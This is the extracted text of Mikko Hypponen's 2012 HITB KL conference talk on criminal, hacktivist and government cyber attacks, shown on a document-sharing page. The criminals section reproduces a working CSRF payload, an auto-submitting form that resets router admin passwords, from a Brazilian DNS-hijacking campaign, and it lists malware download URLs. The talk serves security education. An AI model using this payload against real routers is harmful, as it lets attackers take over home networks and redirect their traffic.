Mikko Hypponen - Behind Enemy Lines.pdf

Preview:

Click to see full reader

Citation preview

HitbSecConfKL 2012

Mikko Hypponen

CRO

F-Secure twitter.com/mikko

• 11 October, 2012

• 11 October, 2012

The Three Main Sources of Cyber Attacks

Criminals Hactivists Governments

Protecting the irreplaceable | f-secure.com

Criminals

Matjaz skorjanc

"Dedicated servers in data

center in Syria for ANY

projects"

"Mass domain registration

service. Buy 5 – 10 – 15

domains instantly. For

malware, traffic and the other

things"

map.honeynet.org

Sality

Sipscan

Zeroaccess KML

file available from

F-Secure Weblog

Case cg4ng3dn5

• 4 million home DSL routers in Braz il

• Huawei, ZyXel, D-Link, Linksys, Netgear…

• Cross Site Request Forgery (CSRF) to be performed in the administration panel of the ADSL modem

• Changing the DNS servers to malicious ones

• Some Brazilian ISPs had more than 50% of users affected

<body onLoad=javascript:document.form.submit()>

<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">

<input type="hidden" name="sptPassword" value="cg4ng3dn5">

<input type="hidden" name="usrPassword" value="cg4ng3dn5">

<input type="hidden" name="sysPassword" value="cg4ng3dn5">

</form>

</body>

Image from

Securelist.

• google.com/GoogleDefence.exe

• facebook.com/ChromeSetup.exe

• facebook.com/Activex_Components.exe

• msn.com/ChromeSetup.exe

Protecting the irreplaceable | f-secure.com

Hactivists

Protecting the irreplaceable | f-secure.com

GeoHot / George Hotz

Comex / Nicholas Allegra

Protecting the irreplaceable | f-secure.com

Governmental attacks

Protecting the irreplaceable | f-secure.com

Nuclear physics lost it's innocence in 1945

6es7-315-2 / 6es7-417

Computer science lost it's innocence in 2009

Gauss encryption mov ecx, (LENGTHOF tToCrypt)-1

mov edx, OFFSET tToCrypt

mov ebx, OFFSET tEncrypt

L1:

mov eax, [edx]

XOR eax, ACDCh

not eax

mov [ebx], eax

inc edx

inc EBX

LOOP L1

mov edx, OFFSET tOutEncr

call WriteString

mov edx, OFFSET tEncrypt

call WriteString

call Crlf

ret

Protecting the irreplaceable | f-secure.com

Protecting the irreplaceable | f-secure.com

HitbSecConfKL 2012

Mikko Hypponen

CRO

F-Secure twitter.com/mikko

Recommended

ARAMCO Welding Requirements for Pipe Lines.pdf
Documents
Protection of Series compensated lines.pdf
Documents
Beatles Bass Lines.pdf
Documents
Mikko Maro (Product)
Documents
Mikko Hypponen Chief Research Officer F-Secure Corporation Virus Bulletin 2006 Montreal KEYNOTE
Documents
Mikko Karppinen
Documents
Mikko Malmivaara, Clothing+
Healthcare
hashdays 2011: Mikko Hypponen - Keynote
Technology
MIKKO TILUS ARCHITECTURE PORTFOLIO
Documents
Ron Carter - Complete Bass Lines.pdf
Documents
Mikko Viikari - HIIT
Documents
Constructing Parallel and Perpendicular Lines.pdf
Documents
Famous Blues Bass Lines.pdf
Documents
WALKING - Jim Stinnett - Creating Jazz Bass Lines.pdf
Documents
Mikko lagerstedt - finnish photographer
Art & Photos
Coordinate of straight lines.pdf
Documents
Mikko Hypponen Chief Research Officer, F-Secure37 Hacker stole an undisclosed amount of the database with 8 million credit card numbers BJs.com Unknown attacker stole 13,000 credit
Documents
How to play JAZZ BASS LINES.pdf
Documents
Method of Lines.pdf
Documents
Bass Guitar Lessons - Bob Cranshaw Bass Lines.pdf
Documents